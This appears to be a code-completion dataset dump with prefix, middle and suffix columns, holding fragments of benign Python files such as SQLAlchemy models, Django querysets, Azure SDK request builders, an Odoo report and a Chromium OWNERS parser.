repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
kkstu/DNStack
|
model/models.py
|
Python
|
mit
| 3,358
| 0.014627
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# Powered By KK Studio
from sqlalchemy import Column, Integer, SmallInteger, VARCHAR, or_, and_
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base):
__tablename__ = 'users'
id = Column(Integer,primary_key=True,autoincrement=True)
username = Column(VAR
|
CHAR(32),nullable=False,unique=True)
password = Column(VARCHAR(64),nullable=False)
password_key = Column(VARCHAR(12),nullable=False,default='a1b2c3d4e5f6')
email = Column(VARCHAR(32),nullable=False,unique=True)
phone = Column(VARCHAR(32),nullable=True)
nickname = Column(VARCHAR(32),nullable=True)
gender = Column(SmallInteger,nullable=True) # 性别
dept = Column(VARCHAR(32),nullable=True) # 部门
role = Column(VARC
|
HAR(32),nullable=True)
lang = Column(VARCHAR(12),nullable=False,default='zh_CN')
login_count = Column(Integer,nullable=False,default=0)
login_time = Column(Integer,nullable=True)
login_ua = Column(VARCHAR(600),nullable=True)
login_ip = Column(VARCHAR(64),nullable=True)
login_location = Column(VARCHAR(32),nullable=True)
create_time = Column(Integer,nullable=True)
update_time = Column(Integer,nullable=True)
status = Column(SmallInteger,nullable=False,default=1)
class Domain(Base):
__tablename__ = 'domain'
id = Column(Integer,primary_key=True,autoincrement=True)
zone = Column(VARCHAR(128),nullable=False,unique=True)
gid = Column(Integer,nullable=True)
comment = Column(VARCHAR(256), nullable=True)
record_count = Column(Integer,nullable=False,default=0)
create_time = Column(Integer,nullable=True)
update_time = Column(Integer,nullable=True)
status = Column(SmallInteger, nullable=False, default=1)
class Groups(Base):
__tablename__ = 'groups'
id = Column(Integer,primary_key=True,autoincrement=True)
name = Column(VARCHAR(128),nullable=False,unique=True)
domain_count = Column(Integer, nullable=False, default=0)
class Record(Base):
__tablename__ = 'record'
id = Column(Integer,primary_key=True,autoincrement=True)
zone = Column(VARCHAR(128), nullable=False)
host = Column(VARCHAR(128), nullable=False)
type = Column(VARCHAR(12), nullable=False)
data = Column(VARCHAR(128), nullable=False)
ttl = Column(Integer, nullable=False,default=600)
mx_priority = Column(Integer, nullable=True)
refresh = Column(Integer, nullable=True)
retry = Column(Integer, nullable=True)
expire = Column(Integer, nullable=True)
minimum = Column(Integer, nullable=True)
serial = Column(Integer, nullable=True)
resp_person = Column(VARCHAR(64), nullable=True)
primary_ns = Column(VARCHAR(64), nullable=True)
comment = Column(VARCHAR(256), nullable=True)
create_time = Column(Integer, nullable=True)
update_time = Column(Integer, nullable=True)
status = Column(SmallInteger, nullable=False, default=1)
class Options(Base):
__tablename__ = 'options'
id = Column(Integer,primary_key=True,autoincrement=True)
name = Column(VARCHAR(128), nullable=False,unique=True)
value = Column(VARCHAR(500), nullable=True)
default_value = Column(VARCHAR(500), nullable=True)
category = Column(VARCHAR(32), nullable=False,default='default')
update_time = Column(Integer, nullable=True)
|
nfqsolutions/pylm
|
examples/parallel/worker.py
|
Python
|
agpl-3.0
| 297
| 0.006734
|
from pylm.servers import Worker
from uuid import uuid4
import sys
class MyWorker(Worker):
de
|
f foo(self, message):
return self.name.encode('utf-8') + b' processed ' + message
server = MyWorker(str(uuid4()), 'tcp://127
|
.0.0.1:5559')
if __name__ == '__main__':
server.start()
|
davidsetiyadi/draft_python
|
new_edukits/edukits_total_retail_report.py
|
Python
|
gpl-3.0
| 24,578
| 0.033282
|
import time
from datetime import datetime
from pytz import timezone
from dateutil.relativedelta import relativedelta
import openerp
from openerp.report.interface import report_rml
from openerp.tools import to_xml
from openerp.report import report_sxw
from datetime import datetime
from openerp.tools.translate import _
from openerp.osv import osv, fields, orm, fields
import math
import re
class edukits_total_retail(report_rml):
def create_xml(self,cr,uid,ids,datas,context={}):
def _thousand_separator(decimal,amount):
if not amount:
amount = 0.0
if type(amount) is float :
amount = str(decimal%amount)
else :
amount = str(amount)
if (amount == '0'):
return ' '
orig = amount
new = re.sub("^(-?\d+)(\d{3})", "\g<1>.\g<2>", amount)
if orig == new:
return new
else:
return _thousand_separator(decimal,new)
pool = openerp.registry(cr.dbname)
order_obj = pool.get('sale.order')
wh_obj = pool.get('stock.warehouse')
session_obj = pool.get('pos.session')
user_obj = pool.get('res.users')
users = user_obj.browse(cr,uid,uid)
warehouse_ids = datas['form']['warehouse_ids'] or wh_obj.search(cr, uid, [])
company = users.company_id
rml_parser = report_sxw.rml_parse(cr, uid, 'edukits_total_retail', context=context)
rml = """
<document filename="test.pdf">
<template pageSize="(21.0cm,29.7cm)" title="Total Retail Report" author="SGEEDE" allowSplitting="20">
<pageTemplate id="first">
<frame id="first" x1="50.0" y1="0.0" width="500" height="830"/>
</pageTemplate>
</template>
<stylesheet>
<blockTableStyle id="Table1">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
<blockTableStyle id="parent_table">
<blockAlignment value="LEFT"/>
<blockLeftPadding start="0,0" length="0.1cm"/>
<blockRightPadding start="0,0" length="0.1cm"/>
<blockTopPadding start="0,0" length="0.15cm"/>
<blockBottomPadding start="0,0" length="0.15cm"/>
</blockTableStyle>
<blockTableStyle id="Table2">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
<blockTableStyle id="Table3">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
</blockTableStyle>
<blockTableStyle id="Table3_Normal">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<blockTopPadding start="0,0" length="-0.15cm"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,1" stop="0,1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="0,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
<blockTableStyle id="Table3_PARENT">
<blockAlignment value="CENTER"/>
<blockValign value="TOP"/>
</blockTableStyle>
"""
for warehouse in wh_obj.browse(cr,uid,warehouse_ids):
if warehouse.color:
rml += """
<blockTableStyle id="Table3""" + to_xml(str(warehouse.color.name)) + """">
<blockBackground colorName="#"""+ to_xml(str(warehouse.color.color)) + """" start="0,0" stop="0,-1"/>
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<blockTopPadding start="0,0" length="0.1cm"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" st
|
art="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,1" stop="0,1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="0,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
"""
if not warehouse.color:
rml += """
<blockTableStyle id="Table3False">
<blockAlignment value="LEFT"/>
<bl
|
ockValign value="TOP"/>
<blockTopPadding start="0,0" length="0.1cm"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="-1,-1"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,1" stop="0,1"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="0,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="-1,-1"/>
</blockTableStyle>
"""
rml += """
<blockTableStyle id="Table3_LINE">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="2,0" stop="2,3"/>
</blockTableStyle>
<blockTableStyle id="Table3_LINE2">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
</blockTableStyle>
<blockTableStyle id="Table3_LINE2W">
<blockBackground colorName="white"/>
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
</blockTableStyle>
<blockTableStyle id="Table1_line">
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="2,0"/>
</blockTableStyle>
<blockTableStyle id="Table1_lines">
<blockBackground colorName="white"/>
<blockAlignment value="LEFT"/>
<blockValign value="TOP"/>
<lineStyle kind="LINEBELOW" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEABOVE" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEBEFORE" colorName="#000000" start="0,0" stop="2,0"/>
<lineStyle kind="LINEAFTER" colorName="#000000" start="0,0" stop="2,0"/>
</blockTableStyle>
<initialize>
<paraStyle name="all" alignment="justify"/>
</initialize>
<paraStyle name="P1" fontName="Helvetica" fontSize="9.0" leading="11" alignment="CENTER" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P2" fontName="Helvetica-Bold" fontSize="14.0" leading="17" alignment="RIGHT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P3" fontName="Times-Roman" fontSize="11.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P4" fontName="Times-Roman" fontSize="11.0" leading="10" alignment="RIGHT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P5" fontName="Times-Roman" fontSize="11.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P6" fontName="Helvetica" fontSize="9.0" leading="11" alignment="LEFT" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P7" fontName="Helvetica" fontSize="9.0" leading="11" alignment="CENTER" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P8" fontName="Helvetica" fontSize="8.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P9" fontName="Times-Roman" fontSize="11.0" leading="14" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P10" fontName="Times-Roman" fontSize="11.0" leading="14" alignment="RIGHT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P11" fontName="Times-Roman" fontSize="11.0" leading="14" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P12" fontName="Helvetica" fontSize="8.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="6.0"/>
<paraStyle name="P13" fontName="Helvetica" fontSize="8.0" leading="10" alignment="LEFT" spaceBefore="0.0" spaceAfter="0.0"/>
<paraStyle name="P14" fontName="Helvetica-Bold" fontSize="12.0" leading="11" alignment="LEFT" spaceBefore="0.0" spaceAfter="1.0"/>
<paraStyle name="P15" textColor="black" fontName="Helvetica" fontSize="10
|
sinotradition/meridian
|
meridian/acupoints/yangfu23.py
|
Python
|
apache-2.0
| 242
| 0.033898
|
#!/usr/bin/python
#coding=utf-8
'''
@aut
|
hor: sheng
@license:
'''
SPELL=u'yángfǔ'
CN=u'阳辅'
NAME=u'yangfu23'
CHANNEL='gallbladder'
CHANNEL_FULLNAME='GallbladderChannelofFoot-Shaoyang'
SEQ='GB38'
if __name__ == '__main_
|
_':
pass
|
Revolution1/ID_generator
|
generator.py
|
Python
|
mit
| 1,559
| 0
|
def is_tl(data):
return isinstance(data, tuple) or isinstance(data, list)
def get_depth(data):
'''
:type data: list or tuple
get the depth of nested list
'x' is 0
['x', 'y'] is 1
['x', ['y', 'z'] is 2
'''
if is_tl(data):
depths = []
for i in data:
depths.append(1+get_depth(i))
return max(depths)
else:
return 0
def reduce_d2(a, b):
'''
generate all combination from a, b
'''
if not is_tl(a):
a = [a]
if not is_tl(b):
b = [b]
result = []
for i in a:
for j in b:
result.append('%s%s' % (i, j))
return result
def _generate_d2(data):
return reduce(reduce_d2, data)
def _generate(data):
'''
recursively generate the list
'''
depth = get_depth(data)
if depth > 2:
temp = []
for i in data:
temp.append(_generate(i))
return _generate(temp)
elif depth == 2:
return _generate_d2(data)
elif depth == 1:
return data
else:
return [str(data)]
def generate(data):
'''
:rtype: list of str
:type data: list or tuple
generate the final result
'''
result = _generate(data)
# fix if initial data's depth == 1
if result
|
== data:
result = _generate_d2(data)
return result
if __name__ == '__main__':
nested = [range(2), [range(3), range(4)]]
print(generate(nested))
print(generate([1, [2, 3]]))
print(generate([1, 2]))
print(generate(1))
| |
python/pythondotorg
|
sponsors/models/managers.py
|
Python
|
apache-2.0
| 4,837
| 0.002067
|
from django.db.models import Count
from ordered_model.models import OrderedModelManager
from django.db.models import Q, Subquery
from django.db.models.query import QuerySet
from django.utils import timezone
from polymorphic.query import PolymorphicQuerySet
class SponsorshipQuerySet(QuerySet):
def in_progress(self):
status = [self.model.APPLIED, self.model.APPROVED]
return self.filter(status__in=status)
def approved(self):
return self.filter(status=self.model.APPROVED)
def visible_to(self, user):
contacts = user.sponsorcontact_set.values_list('sponsor_id', flat=True)
status = [self.model.APPLIED, self.model.APPROVED, self.model.FINALIZED]
return self.filter(
Q(submited_by=user) | Q(sponsor_id__in=Subquery(contacts)),
status__in=status,
).select_related('sponsor')
def finalized(self):
return self.filter(status=self.model.FINALIZED)
def enabled(self):
"""Sponsorship which are finalized and enabled"""
today = timezone.now().date()
qs = self.finalized()
return qs.filter(start_date__lte=today, end_date__gte=today)
def with_logo_placement(self, logo_place=None, publisher=None):
from sponsors.models import LogoPlacement, SponsorBenefit
feature_qs = LogoPlacement.objects.all()
if logo_place:
feature_qs = feature_qs.filter(logo_place=logo_place)
if publisher:
feature_qs = feature_qs.filter(publisher=publisher)
benefit_qs = SponsorBenefit.objects.filter(id__in=Subquery(feature_qs.values_list('sponsor_benefit_id', flat=True)))
return self.filter(id__in=Subquery(benefit_qs.values_list('sponsorship_id', flat=True)))
def includes_benefit_feature(self, feature_model):
from sponsors.models import SponsorBenefit
feature_qs = feature_model.objects.all()
benefit_qs = SponsorBenefit.objects.filter(id__in=Subquery(feature_qs.values_list('sponsor_benefit_id', flat=True)))
return self.filter(id__in=Subquery(benefit_qs.values_list('sponsorship_id', flat=True)))
class SponsorContactQuerySet(QuerySet):
def get_primary_contact(self, sponsor):
contact = self.filter(sponsor=sponsor, primary=True).first()
if not contact:
raise self.model.DoesNotExist()
return contact
def filter_by_contact_types(self, primary=False, administrative=False, accounting=False, manager=False):
if not
|
any([primary, administrative, accounting, manager]):
return self.none()
query = Q()
if primary:
query |= Q(primary=True)
if administrative:
query |= Q(administrative=True)
if accounting:
query |= Q(accounting=True)
if manager:
query |= Q(manager=True)
return self.filter(query)
class SponsorshipBenefitManager(OrderedModelManager):
def with_conflicts(self)
|
:
return self.exclude(conflicts__isnull=True)
def without_conflicts(self):
return self.filter(conflicts__isnull=True)
def add_ons(self):
return self.annotate(num_packages=Count("packages")).filter(num_packages=0, a_la_carte=False)
def a_la_carte(self):
return self.filter(a_la_carte=True)
def with_packages(self):
return (
self.annotate(num_packages=Count("packages"))
.exclude(Q(num_packages=0) | Q(a_la_carte=True))
.order_by("-num_packages", "order")
)
class SponsorshipPackageManager(OrderedModelManager):
def list_advertisables(self):
return self.filter(advertise=True)
class BenefitFeatureQuerySet(PolymorphicQuerySet):
def delete(self):
if not self.polymorphic_disabled:
return self.non_polymorphic().delete()
else:
return super().delete()
def from_sponsorship(self, sponsorship):
return self.filter(sponsor_benefit__sponsorship=sponsorship).select_related("sponsor_benefit__sponsorship")
def required_assets(self):
from sponsors.models.benefits import RequiredAssetMixin
required_assets_classes = RequiredAssetMixin.__subclasses__()
return self.instance_of(*required_assets_classes).select_related("sponsor_benefit__sponsorship")
def provided_assets(self):
from sponsors.models.benefits import ProvidedAssetMixin
provided_assets_classes = ProvidedAssetMixin.__subclasses__()
return self.instance_of(*provided_assets_classes).select_related("sponsor_benefit__sponsorship")
class GenericAssetQuerySet(PolymorphicQuerySet):
def all_assets(self):
from sponsors.models import GenericAsset
classes = GenericAsset.all_asset_types()
return self.select_related("content_type").instance_of(*classes)
|
Azure/azure-sdk-for-python
|
sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_06_01/operations/_private_endpoint_connections_operations.py
|
Python
|
mit
| 21,872
| 0.004618
|
# coding=utf-8
# ------
|
--------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# ---------------------------------------------------------
|
-----------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
JSONType = Any
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
subscription_id: str,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_request(
subscription_id: str,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_update_request(
subscription_id: str,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
*,
json: JSONType = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
subscription_id: str,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', min_length=1),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str', max_length=63, min_length=1, pattern=r'^[a-zA-Z0-9]$|^[a-zA-Z0-9][-_a-zA-Z0-9]{0,61}[a-zA-Z0-9]$'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class PrivateEndpointConnectionsOperations(object):
"""PrivateEndpointConnectionsOperations operations.
|
mtrgroup/django-mtr-utils
|
tests/app/admin.py
|
Python
|
mit
| 908
| 0
|
from django.contrib import admin
from modeltranslation.admin import TabbedTranslationAdmin
from .models import Person, Office, Tag
class PersonAdmin(TabbedTranslationAdmin):
list_display = ('name', 'surname', 'security_level', 'gender')
list_filter = ('security_level', 'tags', 'office', 'name', 'gender')
actions = ['copy_100']
def copy_100(self, request, queryset):
for item in queryset.all():
item.populate()
copy_100.short_description = 'Copy 100 objects with random data'
class PersonStackedInline(admin.TabularInline):
model = Person
extra = 0
class OfficeAdmin(admin.ModelAdm
|
in):
inlines = (PersonStackedInline,)
list_display = ('office', 'address')
class TagAdmin(admin.ModelAdmin):
list_display = ('name',)
admin.site.register(Person, PersonAdmin)
admin.
|
site.register(Office, OfficeAdmin)
admin.site.register(Tag, TagAdmin)
|
nwjs/chromium.src
|
tools/checkteamtags/owners_file_tags.py
|
Python
|
bsd-3-clause
| 7,900
| 0.010633
|
# Copyright (c) 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import posixpath
import re
from collections import defaultdict
def uniform_path_format(native_path):
"""Alters the path if needed to be separated by forward slashes."""
return posixpath.normpath(native_path.replace(os.sep, posixpath.sep))
def parse(filename):
"""Searches the file for lines that start with `# TEAM:` or `# COMPONENT:`.
Args:
filename (str): path to the file to parse.
Returns:
a dict with the following format, with any subset of the listed keys:
{
'component': 'component>name',
'team': 'team@email.here',
'os': 'Linux|Windows|Mac|Android|Chrome|Fuchsia'
}
"""
team_regex = re.compile('\s*#\s*TEAM\s*:\s*(\S+)')
component_regex = re.compile('\s*#\s*COMPONENT\s*:\s*(\S+)')
os_regex = re.compile('\s*#\s*OS\s*:\s*(\S+)')
result = {}
with open(filename) as f:
for line in f:
team_matches = team_regex.match(line)
if team_matches:
result['team'] = team_matches.group(1)
component_matches = component_regex.match(line)
if component_matches:
result['component'] = component_matches.group(1)
os_matches = os_regex.match(line)
if os_matches:
result['os'] = os_matches.group(1)
return result
def aggregate_components_from_owners(all_owners_data, root):
"""Converts the team/component/os tags parsed from OWNERS into mappings.
Args:
all_owners_data (dict): A mapping from relative path to a dir to a dict
mapping the tag names to their values. See docstring for scrape_owners.
root (str): the path to the src directory.
Returns:
A tuple (data, warnings, stats) where data is a dict of the form
{'component-to-team': {'Component1': 'team1@chr...', ...},
'teams-per-component': {'Component1': ['team1@chr...', 'team2@chr...]},
'dir-to-component': {'/path/to/1': 'Component1', ...}}
'dir-to-team': {'/path/to/1': 'team1@', ...}}
, warnings is a list of strings, stats is a dict of form
{'OWNERS-count': total number of OWNERS files,
'OWNERS-with-component-only-count': number of OWNERS have # COMPONENT,
'OWNERS-with-team-and-component-count': number of
OWNERS have TEAM and COMPONENT,
'OWNERS-count-by-depth': {directory depth: number of OWNERS},
'OWNERS-with-component-only-count-by-depth': {directory depth: number
of OWNERS have COMPONENT at this depth},
'OWNERS-with-team-and-component-count-by-depth':{directory depth: ...}}
"""
stats = {}
num_total = 0
num_with_component = 0
num_with_team_component = 0
num_total_by_depth = defaultdict(int)
num_with_component_by_depth = defaultdict(int)
num_with_team_component_by_depth = defaultdict(int)
warnings = []
teams_per_component = defaultdict(set)
topmost_team = {}
dir_to_component = {}
dir_missing_info_by_depth = defaultdict(list)
dir_to_team = {}
for rel_dirname, owners_data in all_owners_data.iteritems():
# Normalize this relative path to posix-style to make counting separators
# work correctly as a means of obtaining the file_depth.
rel_path = un
|
iform_path_format(os.path.relpath(rel_dirname, root))
file_depth = 0 if rel_path == '.' else re
|
l_path.count(posixpath.sep) + 1
num_total += 1
num_total_by_depth[file_depth] += 1
component = owners_data.get('component')
team = owners_data.get('team')
os_tag = owners_data.get('os')
if os_tag and component:
component = '%s(%s)' % (component, os_tag)
if team:
dir_to_team[rel_dirname] = team
if component:
num_with_component += 1
num_with_component_by_depth[file_depth] += 1
dir_to_component[rel_dirname] = component
if team:
num_with_team_component += 1
num_with_team_component_by_depth[file_depth] += 1
teams_per_component[component].add(team)
if component not in topmost_team or file_depth < topmost_team[
component]['depth']:
topmost_team[component] = {'depth': file_depth, 'team': team}
else:
rel_owners_path = uniform_path_format(os.path.join(rel_dirname, 'OWNERS'))
warnings.append('%s has no COMPONENT tag' % rel_owners_path)
if not team and not os_tag:
dir_missing_info_by_depth[file_depth].append(rel_owners_path)
mappings = {
'component-to-team': {
k: v['team'] for k, v in topmost_team.iteritems()
},
'teams-per-component': {
k: sorted(list(v)) for k, v in teams_per_component.iteritems()
},
'dir-to-component': dir_to_component,
'dir-to-team': dir_to_team,
}
warnings += validate_one_team_per_component(mappings)
stats = {'OWNERS-count': num_total,
'OWNERS-with-component-only-count': num_with_component,
'OWNERS-with-team-and-component-count': num_with_team_component,
'OWNERS-count-by-depth': num_total_by_depth,
'OWNERS-with-component-only-count-by-depth':
num_with_component_by_depth,
'OWNERS-with-team-and-component-count-by-depth':
num_with_team_component_by_depth,
'OWNERS-missing-info-by-depth':
dir_missing_info_by_depth}
return mappings, warnings, stats
def validate_one_team_per_component(m):
"""Validates that each component is associated with at most 1 team."""
warnings = []
# TODO(robertocn): Validate the component names: crbug.com/679540
teams_per_component = m['teams-per-component']
for c in teams_per_component:
if len(teams_per_component[c]) > 1:
warnings.append('Component %s has the following teams assigned: %s.\n'
'Team %s is being used, as it is defined at the OWNERS '
'file at the topmost dir'
% (
c,
', '.join(teams_per_component[c]),
m['component-to-team'][c]
))
return warnings
def scrape_owners(root, include_subdirs):
"""Recursively parse OWNERS files for tags.
Args:
root (str): The directory where to start parsing.
include_subdirs (bool): Whether to generate entries for subdirs with no
own OWNERS files based on the parent dir's tags.
Returns a dict in the form below.
{
'/path/to/dir': {
'component': 'component>name',
'team': 'team@email.here',
'os': 'Linux|Windows|Mac|Android|Chrome|Fuchsia'
},
'/path/to/dir/inside/dir': {
'component': ...
}
}
"""
data = {}
def nearest_ancestor_tag(dirname, tag):
""" Find the value of tag in the nearest ancestor that defines it."""
ancestor = os.path.dirname(dirname)
while ancestor:
rel_ancestor = uniform_path_format(os.path.relpath(ancestor, root))
if rel_ancestor in data and data[rel_ancestor].get(tag):
